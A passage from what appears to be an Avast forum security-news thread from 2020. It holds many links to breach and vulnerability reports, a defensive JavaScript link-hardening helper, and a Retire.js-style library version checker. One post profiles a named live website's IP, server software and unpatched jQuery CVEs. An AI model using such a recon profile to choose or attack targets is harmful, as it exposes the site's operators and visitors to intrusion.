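  rel.add("noopener");
  rel.add("noreferrer");
  const relValue = [...rel].join(" ");
  if (/\srel\s*=/i.test(tag)) {
    return tag.replace(/\srel\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+)/i, ` rel="${relValue}"`);
  }
  return tag.replace(/\s*>$/, ` rel="${relValue}">`);
}

// Constructed sample page (an assumption): the first anchor mirrors the Google
// Translate widget markup; the others cover a compliant link, a same-origin
// link and a link whose rel value lacks the two keywords.
const SAMPLE_PAGE_URL = "https://www.example.com/news/some-article";
const SAMPLE_HTML = `
<a class="goog-logo-link" href="https://translate.google.com" target="_blank">Translate</a>
<a href="https://partner.example.net/" target="_blank" rel="noopener noreferrer">Partner</a>
<a href="/about" target="_blank">About us</a>
<a href="https://ads.example.org/click" target='_blank' rel="nofollow">Sponsored</a>
`;

const report = findDisownOpenerHints(SAMPLE_HTML, SAMPLE_PAGE_URL);
for (const f of report) {
  console.log(`${f.href}: missing ${f.missing.join(", ")}`);
  console.log(`  fix: ${fixAnchor(f.tag)}`);
}
```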
-
Microsoft Outsourced Skype, Cortana Voice Analysis to China With Virtually No Security in Place
https://gizmodo.com/microsoft-outsourced-skype-cortana-voice-analysis-to-c-1840935163
-
Hack Cambridge’s young geniuses to take a crack at the Avast Secure Browser
https://blog.avast.com/avast-team-prepares-for-hack-cambridge
I personally can't wait for the results.
-
Hundreds of millions of cable modems are vulnerable to new Cable Haunt vulnerability
https://www.zdnet.com/article/hundreds-of-millions-of-cable-modems-are-vulnerable-to-new-cable-haunt-vulnerability/
What is Cable Haunt? https://cablehaunt.com/
-
130,000 WordPress CMS websites vulnerable because of a holed plug-in.
Vulnerable plug-in = https://wordpress.org/plugins/iwp-client
You could get infested through a specially crafted request:
https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/
168,000 WordPress websites already patched: https://wordpress.org/plugins/iwp-client/advanced/
Badly configured, insecure WordPress CMS based on PHP remains a security liability by design, i.m.h.o.
polonus
-
TrickBot Now Uses a Windows 10 UAC Bypass to Evade Detection
https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/
-
ADV200001 | Microsoft Guidance on Scripting Engine Memory Corruption Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001
-
ADV200001 | Microsoft Guidance on Scripting Engine Memory Corruption Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001
Actively Exploited IE 11 Zero-Day Bug Gets Temporary Patch
https://www.bleepingcomputer.com/news/security/actively-exploited-ie-11-zero-day-bug-gets-temporary-patch/
https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html
-
ADV200001 | Microsoft Guidance on Scripting Engine Memory Corruption Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001
Actively Exploited IE 11 Zero-Day Bug Gets Temporary Patch
https://www.bleepingcomputer.com/news/security/actively-exploited-ie-11-zero-day-bug-gets-temporary-patch/
https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html
Savvy users have long since removed or at least turned off IE11. :)
-
Final Windows 7 Update Breaks Desktop Wallpaper Functionality
https://www.bleepingcomputer.com/news/microsoft/final-windows-7-update-breaks-desktop-wallpaper-functionality/
-
Report: 250 million Microsoft customer service and support records exposed on the web
https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/
-
Report: 250 million Microsoft customer service and support records exposed on the web
https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/
MS states that they have contacted the users affected. I didn't get any notification.
Wonder if that means I'm not affected?
-
Report: 250 million Microsoft customer service and support records exposed on the web
https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/
MS states that they have contacted the users affected. I didn't get any notification.
Wonder if that means I'm not affected?
Let's hope so Bob, but only the guys at Microsoft can say for sure.
-
Report: 250 million Microsoft customer service and support records exposed on the web
https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/
MS states that they have contacted the users affected. I didn't get any notification.
Wonder if that means I'm not affected?
Let's hope so Bob, but only the guys at Microsoft can say for sure.
Access Misconfiguration for Customer Support Database
https://msrc-blog.microsoft.com/2020/01/22/access-misconfiguration-for-customer-support-database/
-
Report: 250 million Microsoft customer service and support records exposed on the web
https://www.comparitech.com/blog/information-security/microsoft-customer-service-data-leak/
MS states that they have contacted the users affected. I didn't get any notification.
Wonder if that means I'm not affected?
Let's hope so Bob, but only the guys at Microsoft can say for sure.
Access Misconfiguration for Customer Support Database
https://msrc-blog.microsoft.com/2020/01/22/access-misconfiguration-for-customer-support-database/
According to that article, Customer notification may still be ongoing.
"we were able to quickly fix this misconfiguration, investigate the situation, and begin notifying customers as appropriate."
-
ADV200001 | Microsoft Guidance on Scripting Engine Memory Corruption Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001
Actively Exploited IE 11 Zero-Day Bug Gets Temporary Patch
https://www.bleepingcomputer.com/news/security/actively-exploited-ie-11-zero-day-bug-gets-temporary-patch/
https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html
Savvy users have long since removed or at least turned off IE11. :)
Microsoft's IE Zero-day Fix is Breaking Windows Printing
https://www.bleepingcomputer.com/news/security/microsofts-ie-zero-day-fix-is-breaking-windows-printing/
-
Mozilla has banned nearly 200 malicious Firefox add-ons over the last two weeks
https://www.zdnet.com/article/mozilla-has-banned-nearly-200-malicious-firefox-add-ons-over-the-last-two-weeks/
-
Final Windows 7 Update Breaks Desktop Wallpaper Functionality
https://www.bleepingcomputer.com/news/microsoft/final-windows-7-update-breaks-desktop-wallpaper-functionality/
Windows 7 To Get Post End of Life Update to Fix Wallpaper Bug
https://www.bleepingcomputer.com/news/microsoft/windows-7-to-get-post-end-of-life-update-to-fix-wallpaper-bug/
-
Linear eMerge E3 access controller actively being exploited
https://securitynews.sonicwall.com/xmlpost/linear-emerge-e3-access-controller-actively-being-exploited/
-
Emotet Gears Up to File (Your) Taxes
https://cofense.com/emotet-gears-file-taxes/
-
Most dangerous Emotet malware now evolves with a Wifi-Spreader (being detected only after two years' time :o )
Read analysis: https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/
polonus
-
ADV200001 | Microsoft Guidance on Scripting Engine Memory Corruption Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001
Actively Exploited IE 11 Zero-Day Bug Gets Temporary Patch
https://www.bleepingcomputer.com/news/security/actively-exploited-ie-11-zero-day-bug-gets-temporary-patch/
https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html
Savvy users have long since removed or at least turned off IE11. :)
Microsoft's IE Zero-day Fix is Breaking Windows Printing
https://www.bleepingcomputer.com/news/security/microsofts-ie-zero-day-fix-is-breaking-windows-printing/
Microsoft Patches Actively Exploited Internet Explorer Zero-Day
https://www.bleepingcomputer.com/news/security/microsoft-patches-actively-exploited-internet-explorer-zero-day/
-
K-bot, an old-fashioned infector of executable files:
Read: https://securelist.com/kbot-sometimes-they-come-back/96157/ (info credits go to Kaspersky's Anna Malina).
polonus
-
Dangerous: "Zero-Day Code Injection and Persistence Technique",
Re: https://github.com/Cybellum/DoubleAgent
polonus
-
‘The intelligence coup of the century’
For decades, the CIA read the encrypted communications of allies and adversaries.
https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/
SRF > https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt
ZDF > https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html
Operation RUBICON > https://www.cryptomuseum.com/intel/cia/rubicon.htm
-
‘The intelligence coup of the century’
For decades, the CIA read the encrypted communications of allies and adversaries.
https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/
SRF > https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt
ZDF > https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html
Operation RUBICON > https://www.cryptomuseum.com/intel/cia/rubicon.htm
So how does this affect the average technology user?
-
‘The intelligence coup of the century’
For decades, the CIA read the encrypted communications of allies and adversaries.
https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/
SRF > https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt
ZDF > https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html
Operation RUBICON > https://www.cryptomuseum.com/intel/cia/rubicon.htm
So how does this affect the average technology user?
No idea. Interesting reading
-
‘The intelligence coup of the century’
For decades, the CIA read the encrypted communications of allies and adversaries.
https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/
SRF > https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt
ZDF > https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html
Operation RUBICON > https://www.cryptomuseum.com/intel/cia/rubicon.htm
So how does this affect the average technology user?
In no way, this was cross-national espionage.
-
‘The intelligence coup of the century’
For decades, the CIA read the encrypted communications of allies and adversaries.
https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/
SRF > https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt
ZDF > https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html
Operation RUBICON > https://www.cryptomuseum.com/intel/cia/rubicon.htm
So how does this affect the average technology user?
In no way, this was cross-national espionage.
Something that goes on in every country. Even if it does affect us, it isn't anything an individual can do anything about.
-
WordPress GDPR Cookie Consent plugin fixed vulnerability
https://blog.nintechnet.com/wordpress-gdpr-cookie-consent-plugin-fixed-vulnerability/
-
As Asyn said, over 72.000 WordPress websites vulnerable:
https://www.webarxsecurity.com/critical-issue-in-themegrill-demo-importer/
&
https://wordpress.org/plugins/themegrill-demo-importer/advanced/
Going from incident to incident with this CMS, based on the "can of worms" language PHP, full of outdated and vulnerable plug-in code,
retirable jQuery libraries, misconfigured settings like "user enumeration" and "directory listing" set to "enabled".
Those that have the relevant knowledge do not count; those that take the decisions often lack that knowledge.
One rather desires a "licked" website over a secure one. End-users pay the price, often coming to them as "abuse" by malcreants.
I am mentioning these issues over and over again, also in the "virus and worms" section, but often totally in vain.
No one reacts, or they are just not interested.
polonus
-
Critical Vulnerability In Profile Builder Plugin Allowed Site Takeover
https://www.wordfence.com/blog/2020/02/critical-vulnerability-in-profile-builder-plugin-allowed-site-takeover/
-
Just another Hack?
https://www.zdnet.com/article/exclusive-details-of-10-6-million-of-mgm-hotel-guests-posted-on-a-hacking-forum/
-
AZORult spreads as a fake ProtonVPN installer
https://securelist.com/azorult-spreads-as-a-fake-protonvpn-installer/96261/
-
Vulnerable Word Press Plug-ins attacked:
https://www.wordfence.com/blog/2020/02/multiple-attack-campaigns-targeting-recent-plugin-vulnerabilities/
Thousands of Word Press websites are at risk,
polonus
-
Even big websites have Word Press as CMS: htxps://thecsrjournal.in/wp-content/
and sometimes outdated software running..
Blacklisted external link: htXps://syndication.twitter.com/settings
The domain is blacklisted: -syndication.twitter.com from CryptoScamDB
(checked using the Open Websniffer extension by 5MS, 5MS dot ru; the developer credit reads "Development and support 5MS").
https://syndication.twitter.com/i/jot? - widget -> %7B%22_category_%22%3A%22syndicated_impression%22%2C%22triggered_on%22%3A1582656898837%2C%22dnt%22%3Afalse%2C%22event_namespace%22%3A%7B%22client%22%3A%22tfw%22%2C%22page%22%3A%22timeline%22%2C%22action%22%3A%22impression%22%7D%7D ....
WordPress version WordPress 5.2.5
Reputation Check
PASSED
Google Safe Browse:OK
Spamhaus Check:OK
Abuse CC:OK
Dshield Blocklist:OK
Cisco Talos Blacklist:OK
Web Server:
Apache/2.4.18 (Ubuntu)
X-Powered-By:
PHP/7.2.20-2+ubuntu16.04.1+deb.sury.org+1 (excessive server version info proliferation)
IP Address:
210.89.48.48
Hosting Provider:
Broadband Pacenet Pvt. Ltd
Shared Hosting:
2 sites found on 210.89.48.48 (see vulnerabilities: https://www.shodan.io/host/210.89.48.48 )
Consider: https://urlscan.io/result/7604e69d-fb8b-44a2-9736-53b4e386aecc
Outdated content: Apache under 2.4.41 http://httpd.apache.org/security/vulnerabilities_24.html
Outdated PHP: PHP under 7.2.25 -> http://php.net/ChangeLog-7.php#7.2.25
Vuln.: https://webcookies.org/cookies/thecsrjournal.in/29134540?114990 E-grade results.
Retirable jQuery libraries: Retire.js
jquery-mobile 1.3.2 Found in -https://thecsrjournal.in/wp-content/plugins/photo-gallery/js/jquery.mobile.min.js?ver=1.3.2
Vulnerability info:
Medium open redirect leads to cross site scripting
jquery 1.12.4 Found in -https://thecsrjournal.in/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Vulnerability info:
Medium 2432 3rd party CORS request may execute CVE-2015-9251
Medium CVE-2015-9251 11974 parseHTML() executes scripts in event handlers
Low CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
JavaScript syntax errors: SyntaxError: Invalid or unexpected token
/wp-content/plugins/news-ticker-tj/js/custom.js?ver=6.0.2:2
TypeError: Cannot read property 'querySelector' of null
/ etc.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
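The Retire.js findings quoted above come from matching the version carried in each script URL against a table of published advisories. As an added example, which is neither polonus's code nor Retire.js itself, the JavaScript below performs that check for the two URL shapes seen in the scan (a WordPress `?ver=` parameter and a version embedded in the file name). The advisory table is constructed from the jQuery CVEs quoted in the post; the fixed-in versions 3.0.0 and 3.4.0 are assumptions, since the scan output does not state them, and the jquery-mobile entry carries no CVE because the scan gives none.

```javascript
// Added example: a minimal Retire.js-style check of script URLs.
// The table below is constructed for this example; "fixedIn" values are assumed.
const KNOWN_ISSUES = {
  jquery: [
    { id: 'CVE-2015-9251', fixedIn: '3.0.0', severity: 'medium',
      note: '3rd party CORS request may execute' },
    { id: 'CVE-2019-11358', fixedIn: '3.4.0', severity: 'low',
      note: 'jQuery.extend(true, {}, ...) Object.prototype pollution' },
  ],
  'jquery-mobile': [
    // No CVE in the scan output; fixedIn null means every version is reported.
    { id: 'open redirect leads to cross site scripting', fixedIn: null, severity: 'medium' },
  ],
};

// Recognise the library and version from URLs such as
//   .../jquery.js?ver=1.12.4-wp            (WordPress ?ver= convention)
//   .../jquery.mobile.min.js?ver=1.3.2
//   .../jquery-3.5.1.min.js                (version in the file name)
function parseScriptUrl(url) {
  const u = new URL(url, 'https://example.invalid/'); // base only used for relative URLs
  const file = u.pathname.split('/').pop().toLowerCase();
  let lib = null;
  if (/^jquery\.mobile/.test(file)) lib = 'jquery-mobile';
  else if (/^jquery[.-]/.test(file)) lib = 'jquery';
  if (!lib) return null;

  let ver = u.searchParams.get('ver');
  if (!ver) {
    const m = file.match(/(\d+\.\d+(?:\.\d+)?)/);
    ver = m ? m[1] : null;
  }
  if (!ver) return { lib, version: null };
  const numeric = ver.match(/^\d+(?:\.\d+)*/); // drop suffixes such as "-wp"
  return { lib, version: numeric ? numeric[0] : null };
}

// Dotted-numeric comparison: -1 if a < b, 0 if equal, 1 if a > b.
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Return the advisory ids that apply to the library version in the URL.
function findVulnerabilities(url) {
  const parsed = parseScriptUrl(url);
  if (!parsed || !parsed.version) return [];
  const issues = KNOWN_ISSUES[parsed.lib] || [];
  return issues
    .filter(i => i.fixedIn === null || compareVersions(parsed.version, i.fixedIn) < 0)
    .map(i => i.id);
}

// Scan a list of script URLs (as collected from a page) and report per URL.
function scanScripts(urls) {
  return urls
    .map(url => ({ url, findings: findVulnerabilities(url) }))
    .filter(r => r.findings.length > 0);
}

module.exports = { parseScriptUrl, compareVersions, findVulnerabilities, scanScripts };
```

Running `scanScripts` over the two URLs from the post reports both: jQuery 1.12.4 is below both assumed fixed-in versions, and jquery-mobile 1.3.2 is reported unconditionally. A build pipeline can fail on a non-empty result; the table would normally be the Retire.js repository data rather than a hand-written object.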
-
For the insecurity aware among us: http://www.nothink.org/
Know what is out there on the Interwebz...
pol
-
I have been reporting about unpatched and vulnerable PHP-based CMS software for as long as I have been on these here forums,
and that is quite some time. And in this case especially about WordPress flaws and Magento webshop glitches and insecurity.
These issues showed up in many of my 3rd party cold recon scan results of vulnerable/infested WordPress driven websites,
for which I asked attention in the virus and worms section of these here forums.
Seems however all in vain, as the trained monkeys develop on
for decision makers that would rather see a "licked" website than a more secure one.
So no one seems to give "a hoot" to what this here "oldtimer", polonus, has to say.
Alas, that's how the world turns 'round these days. :'(
Now the Australian government comes with recommendations to get Word Press CMS somewhat more secure:
https://www.cyber.gov.au/publications/securing-content-management-systems
Magento driven webshops not much better situation, consider: https://publicwww.com/websites/magento+/3
(Mind this is a resource address for researchers, do not abuse the info found there >:( )
Have a nice day,
polonus
-
And another never-ending story, ransomware...yep, even here on an MS subdomain...
Re: https://www.theregister.co.uk/2020/03/04/microsoft_subdomain_takeover/
Mind to check your updates for fraudulent ones, folks. "Do not click to get your OS and all of your files sick".
polonus
-
Virgin Media data incident
https://www.virginmedia.com/corporate/media-centre/press-releases/virgin-medias-data-incident
https://www.virginmedia.com/help/data-incident/important-information
-
T-Mobile Data Breach Exposes Customer's Personal, Financial Info
https://www.bleepingcomputer.com/news/security/t-mobile-data-breach-exposes-customer-personal-financial-info/
-
Israeli Marketing Company Exposes Contacts Database
https://www.bankinfosecurity.com/israeli-marketing-company-exposes-contacts-database-a-13785
-
Word Press sites under attack because of vulnerable "left" plug-in code.
One could easily see that this is "left" code, never been updated since 2016 :>(
See : https://github.com/ghsh88/custom-searchable-data-entry-system
Who is installing some plug-in code from 2015/16 onto a 2020 website?
Not a very bright thing to do, is it?
Easy peasy for malcreants by courtesy of a PHP-based CMS (insecure outside the core code).
Consider this testing site: https://turgensec.com/Obscurity/Obscurity.html (do not do any evil with it).
And you also are left with zero security advice here:
https://github.com/ghsh88/custom-searchable-data-entry-system/security/advisories
Also Kate at Kate@example.com cannot give you any further assistance. (info source: luntrus)
polonus
-
Many an adblock- and vpn-app is a hidden data grabbing tool:
Read: https://www.buzzfeednews.com/article/craigsilverman/vpn-and-ad-blocking-apps-sensor-tower
Mentioned here are Free and Unlimited VPN, Luna VPN, Mobile Data, & Adblock Focus found in the Google Play Store.
polonus
-
IPAS: Security Advisories for March 2020
https://blogs.intel.com/technology/2020/03/ipas-security-advisories-for-march-2020/
-
Just to stress the importance of JavaScript security in the Tor browser:
https://www.zdnet.com/article/tor-team-warns-of-tor-browser-bug-that-runs-javascript-on-sites-it-shouldnt/
Mind tor settings: about:config: extensions.torbutton.noscript_inited = true
Good to be aware of the implications of JavaScript insecurity.
JavaScript can be used to unmask the users of a particular browser and the real IP address they send over the wire;
JavaScript flaws have been used against Tor users in the past as a Firefox zero-day.
FBI also used it to be able to unmask Tor browser users in the past in the Freedom Hosting hijack...
http://www.independent.ie/irish-news/courts/child-porn-accused-trying-to-move-to-russia-fbi-29574802.html
polonus
-
FBI Arrests Alleged Owner of Deer.io, a Top Broker of Stolen Accounts
https://krebsonsecurity.com/2020/03/fbi-arrests-alleged-owner-of-deer-io-a-top-broker-of-stolen-accounts/
-
Used to be a big fan of Avast and saw this today. Should not be surprised. But a warning to anyone using Avast or AVG.
https://www.pcworld.com/article/3516502/report-avast-and-avg-collect-and-sell-your-personal-info-via-their-free-antivirus-programs.html
where to read the official position?
-
where to read the official position?
-> https://forum.avast.com/index.php?topic=231828.0
-
Malicious corona-virus-tracker app locks your phone.
Re: https://twitter.com/LukasStefanko/status/1239826056103825408
Re: https://www.domaintools.com/resources/blog/covidlock-update-coronavirus-ransomware
The universal key to unlock = "4865083501".
Malcreants with too much time on their hands, because of corona-virus-measures, use this to think of ways to abuse.
The one uses his free time to protect and aid others, the others to abuse and ruin for money.
Stay vigilant and do not fall for the PHISH, scam and spam.
Look before you leap, uh I mean install an app.
polonus
-
ADV200006 | Type 1 Font Parsing Remote Code Execution Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006
-
Magento webshops kept failed log-on data in plain text.
Better and more secure ways already exist: https://en.wikipedia.org/wiki/Digest_access_authentication
Read: https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update
Apply the hotfix: https://magento.com/security/hot-fix-available-cve-2019-8118
Scan at: https://www.magereport.com/
A better way however is to make use of digital signatures (SSH authentication,
TLS client certificates, WebAuthn) because a server then only keeps public data as information.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
VPN bypass vulnerability in Apple iOS
https://protonvpn.com/blog/apple-ios-vulnerability-disclosure/
-
FBI Warns of Ongoing Zoom-Bombing Attacks on Video Meetings
https://www.bleepingcomputer.com/news/security/fbi-warns-of-ongoing-zoom-bombing-attacks-on-video-meetings/
https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic
-
FBI Warns of Ongoing Zoom-Bombing Attacks on Video Meetings
https://www.bleepingcomputer.com/news/security/fbi-warns-of-ongoing-zoom-bombing-attacks-on-video-meetings/
https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic
Don't advertise your meetings on open or social websites. Protect the meeting with a password.
It isn't hard to keep the bad guys out.
-
Security Advisories: D-Link DSL-2640B
https://raelize.com/posts/d-link-dsl-2640b-security-advisories/
-
Ongoing scans for port 5555 by all kind of systems?
Two views on this and such scans:
https://www.experts-exchange.com/questions/22726184/Port-5555-is-open.html
Scanning is for the Android Debug Bridge port:
https://www.bleepingcomputer.com/news/security/tens-of-thousands-of-android-devices-are-exposing-their-debug-port/
Consider: https://www.shodan.io/search?query=Android+Debug+Bridge+port%3A5555&language=en
With all these thousands of Google proprietary Android devices and IoT-crap around, not astounding, also on 8.8.8.8.
-> https://www.shodan.io/host/8.8.8.8/raw
Cybercriminals wanna contact open ADB ports to be able to get "root".
Why - to silently install a Miner worm and the likes.
How to disable this port 5555 ADB service:
http://www.hacktabs.com/enable-disable-adb-wifi-rooted-non-rooted-android/
Stay vigilant users, (info credits go to luntrus)
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Here we can see what the issue is: https://viz.greynoise.io/query/?gnql=port%3A5555
Stop this by firewalling, see:
https://www.openbsd.org/faq/pf/filter.html#defdeny &
http://linux-training.be/networking/ch14.html#idp69772096 (or for your language).
So the conclusion for now: some of it is malicious, e.g. Mirai & Telnet scanning.
polonus
-
LS
Every IP scan or domain scan or AS scan for that matter should be examined separately to know what is going on from there.
Sometimes this means benign security scans, sometimes probing with malicious intent, sometimes simple outright malware
to send out spamraids with, scam & malware (Mirai).
Let us just take a random example IP which is doing port scanning for port 5555, a scanning that comes from
IP address 112.119.218.130 in HongKong, apparently performed by netvigator (game shield) dot com domain.
VirusTotal shows 1 engine to detect, detecting spam, here we have it:
https://www.virustotal.com/gui/ip-address/112.119.218.130/detection
GreyNoise cannot help us much in these respects, just alerts the scans being performed:
https://viz.greynoise.io/query/?gnql=metadata.rdns%3An112119218130.netvigator.com
Shodan is not quite clear on what it is: https://www.shodan.io/host/112.119.218.130/raw
Again here we stumble on quite some interesting underlying data: https://intelx.io/?s=netvigator.com
Data, coming from this awful Intelligence scanner made by the firm of the renowned Peter Kleissner,
hacker/researcher/ sinkhole expert from Vienna (now Prague).
I was so happy to get some online outbuilding on automated sinkholing from him during 2017.
Summa summarum every IP address and/or domain/AS should be considered separately to what this scanning means.
I do this just through 3rd party cold recon security scanning.
In this case the buzzword apparently is "gamer SPAM".
But it could also be something quite innocent like benign bot-scans or security scantool action.
Moreover at netvigator dot com JSONP script I found flaws in the settings of their CSP implementation,
just to mention this on the by and by. (Info credits go to: luntrus)
polonus
-
WordPress removes plug-in that was installed 100.000 times.
Left by developer. It is this plug-in that's involved: https://wordpress.org/plugins/contact-form-7-datepicker/
Where it was being reported: https://www.wordfence.com/blog/2020/04/high-severity-vulnerability-leads
See: https://wordpress.org/support/topic/why-was-this-plugin-removed-should-i-remove-it-from-my-site/
Scan when you use WordPress with this WP security scan: https://hackertarget.com/wordpress-security-scan/
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Hi robert1297,
Coronavirus means heydays for cybercriminals of all sorts, malcreants, scammers, spammers, fake-news & fraud spreaders, the lot.
Mind your "clicks" while you keep your distance also digitally. Let's stick together from home.
polonus
-
Hi robert1297,
Coronavirus means heydays for cybercriminals of all sorts, malcreants, scammers, spammers, fake-news & fraud spreaders, the lot.
Mind your "clicks" while you keep your distance also digitally. Let's stick together from home.
polonus
Nothing has changed in this regard for pond scum and bottom feeders, they are quick to jump on anything of social interest.
-
Banking Malware Spreading via COVID-19 Relief Payment Phishing
https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/
-
Banking Malware Spreading via COVID-19 Relief Payment Phishing
https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/
This isn't helped by legit companies asking for donations (such as PayPal) and people's genuine wish to help. So these pond life scum take advantage, so no change there then.
People really need to be aware of any such scam/s relating to what is currently the hot topic in social media/news etc. In that too, nothing has changed, be suspicious and know the source you are supposedly visiting.
-
Banking Malware Spreading via COVID-19 Relief Payment Phishing
https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/
This isn't helped by legit companies asking for donations (such as PayPal) and people's genuine wish to help. So these pond life scum take advantage, so no change there then.
People really need to be aware of any such scam/s relating to what is currently the hot topic in social media/news etc. In that too, nothing has changed, be suspicious and know the source you are supposedly visiting.
https://forum.avast.com/index.php?topic=232867.msg1541456#msg1541456
-
Banking Malware Spreading via COVID-19 Relief Payment Phishing
https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/
This isn't helped by legit companies asking for donations (such as PayPal) and people's genuine wish to help. So these pond life scum take advantage, so no change there then.
People really need to be aware of any such scam/s relating to what is currently the hot topic in social media/news etc. In that too, nothing has changed, be suspicious and know the source you are supposedly visiting.
https://forum.avast.com/index.php?topic=232867.msg1541456#msg1541456
Something that most people need to view, as for me I have been watching out for pond life scammers for many many years. As long as I have been using the forums for sure :)
-
Banking Malware Spreading via COVID-19 Relief Payment Phishing
https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/
This isn't helped by legit companies asking for donations (such as PayPal) and people's genuine wish to help. So these pond life scum take advantage, so no change there then.
People really need to be aware of any such scam/s relating to what is currently the hot topic in social media/news etc. In that too, nothing has changed, be suspicious and know the source you are supposedly visiting.
https://forum.avast.com/index.php?topic=232867.msg1541456#msg1541456
Something that most people need to view, as for me I have been watching out for pond life scammers for many many years. As long as I have been using the forums for sure :)
Sometimes, on this forum, it's hard to get folks to actually spend the time to watch a video even if it may be helpful. :)
-
<snip quotes>
Sometimes, on this forum, it's hard to get folks to actually spend the time to watch a video even if it may be helpful. :)
Unfortunately for some, they don't do anything/seek help until they are hit.
Hopefully people aren't ignoring the real Covid-19 advice.
-
If you're using ZOOM (https://zoom.us/), here's an excellent video to make Zoom and you
more secure. https://youtu.be/-_mgnmmCv2M
-
Stop downloading "unkillable malware" apps!
Read: https://www.theregister.co.uk/2020/04/08/xhelper_android_malware/
polonus
-
L.S.
Always keep your friends close but your enemies even closer:
https://www.blackhatworld.com/seo/guides-get-this-pandemic-backlinks.1209771/
Forewarned always means being forearmed.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
@polonus
Hi!
Why is s.th. of this thread(?) not secure (see screenshot). Have I to change s.th.(where)?
;)
=Snake=
-
@polonus
Hi!
Why is s.th. of this thread(?) not secure (see screenshot). Have I to change s.th.(where)?
;)
=Snake=
There is nothing to change; whilst the site is https, not all of the content is from https sources. This is typically when people attach images (or other elements) located on non-secure locations.
Just click on the secure icon and it will tell you, see attached image.
-
Cybercriminals targeting critical healthcare institutions with ransomware
https://www.interpol.int/en/News-and-Events/News/2020/Cybercriminals-targeting-critical-healthcare-institutions-with-ransomware
-
Cybercriminals targeting critical healthcare institutions with ransomware
https://www.interpol.int/en/News-and-Events/News/2020/Cybercriminals-targeting-critical-healthcare-institutions-with-ransomware
Does this really need to be in 2 places?
-
Over 500,000 Zoom accounts sold on hacker forums, the dark web
https://www.bleepingcomputer.com/news/security/over-500-000-zoom-accounts-sold-on-hacker-forums-the-dark-web/
-
Over 500,000 Zoom accounts sold on hacker forums, the dark web
https://www.bleepingcomputer.com/news/security/over-500-000-zoom-accounts-sold-on-hacker-forums-the-dark-web/
Meeting credentials for me change for each meeting so does the randomly created password.
-
Starting 4/18/2020 paid customers will be able to customize which data center regions their account can use,
by opting in or out of a specific data center region for real-time meeting data in transit.
Zoom admins and account owners of paid accounts can, at the account, group, or user level:
Opt out of specific data center regions
Opt in to specific data center regions
(https://screencast-o-matic.com/screenshots/u/Lh/1586870630256-45374.png)
-
Coronavirus Update App Leads to Project Spy Android and iOS Spyware
https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/
-
Again Word Press sites could be taken over (hijacked) through Onetone-theme flaw (software left by developer).
A good 20.000 Word Press websites now at risk.
